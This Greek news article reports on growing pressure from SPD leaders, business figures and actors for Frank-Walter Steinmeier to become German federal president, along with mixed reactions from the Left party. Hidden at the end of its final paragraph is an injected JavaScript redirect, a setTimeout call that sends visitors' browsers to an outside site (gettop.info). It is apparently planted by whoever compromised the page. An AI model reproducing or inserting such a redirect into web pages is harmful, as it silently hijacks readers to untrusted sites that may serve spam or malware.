Εντείνονται οι πιέσεις υπέρ του Σταϊνμάιερ

0
3

 

O αντιπρόεδρος του SPD Όλαφ Σολτς ανέφερε σε συνέντευξη στην κυριακάτικη Tagesspiegel ότι όποιος παραβλέπει την επιθυμία των πολιτών για καθαρά λόγους κομματικής τακτικής, βλάπτει το γόητρο της Δημοκρατίας. «Για το υψηλότερο αξίωμα της χώρας μόνη κατάλληλη είναι μια προσωπικότητα που χαίρει της ίδιας υψηλής εκτίμησης, όπως ο Σταϊνμάιερ, και αυτές δεν είναι πολλές» τόνισε κάνοντας αναφορά στις δημοσκοπήσεις που δείχνουν τον υπουργό Εξωτερικών ως τον πλέον δημοφιλή γερμανό πολιτικό.

«Μπορεί να ανταποκριθεί στο αξίωμα»

Χθες ο επικεφαλής της ΚΟ του ίδιου κόμματος Τόμας Όπερμαν, είπε στην Passauer Neuen Presse ότι «πριν τα κόμματα του μεγάλου συνασπισμού συμφωνήσουν στον μικρότερο δυνατό παρονομαστή, θα πρέπει το κάθε κόμμα να παρουσιάσει τη δική του υποψηφιότητα, και το Σοσιαλδημοκρατικό κόμμα από την πλευρά του θα παρουσιάσει τον καλύτερο υποψήφιο στο πρόσωπο του Σταϊνμάιερ». Υπέρ της υποψηφιότητας τάχθηκαν και εκπρόσωποι από την οικονομία και τον πολιτισμό.

Ο επικεφαλής του τομέα τεχνολογίας της Siemens Ζίγκφριντ Ρούσβουρμ ανέφερε στην κυριακάτικη Bild ότι ο Σταϊνμάιερ είναι σε θέση να ανταποκριθεί στο αξίωμα από κάθε άποψη. «Εκφράζει σαφή μηνύματα χωρίς να προσβάλει τον συνομιλητή του». Στην ίδια εφημερίδα, όπως αναδημοσιεύει η Deutsche Welle, υπέρ του Σταϊνμάιερ τάχθηκαν οι ηθοποιοί Άρμιν Μύλερ Σταλ και Μάριο Άντορφ και ο σκηνοθέτης Σένκε Βορτμαν.

Οι ζυμώσεις συνεχίζονται

Αλλά τι γίνεται στα άλλα κόμματα; Μέχρι στιγμής η υποψηφιότητα Σταϊνμάιερ απορρίπτονταν από το κόμμα Η Αριστερά. Η επικεφαλής του Κάτια Κίπινγκ τόνιζε χαρακτηριστικά στη χθεσινή Passauer Neuen Presse πως είναι δύσκολο να στηριχτεί αυτή η υποψηφιότητα με το αιτιολογικό ότι ο Σταινμαϊερ είναι ένας από τους «αρχιτέκτονες» της Ατζέντας 2010 του πρώην καγκελάριου Σρέντερ. Ωστόσο η Σάρα Βάγκενκνχτ, επικεφαλής της ΚΟ του κόμματος, δεν το απέκλεισε. «Ο Σταϊνμάιερ άφησε στην πολιτική έναντι της Ρωσίας ίχνη λογικής σε αντίθεση με τις πολεμικές ιαχές των Χριστιανικών κομμάτων και των Πρασίνων» υπογράμμισε στην κυριακάτικη Bild.

Στις 7 Νοεμβρίου οι πρόεδροι των κυβερνητικών κομμάτων Μέρκελ, Γκάμπριελ και ο Βαυαρός Χορστ Ζέχοφερ θα έχουν σχετικές διαβουλεύσεις. Σε περίπτωση που δεν επιτευχθεί σύγκλιση απόψεων τότε οι χριστιανοδημοκράτες θα υποδείξουν ως τις αρχές Δεκεμβρίου δικό τους υποψήφιο. Η διελκυστίνδα συνεχίζεται. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here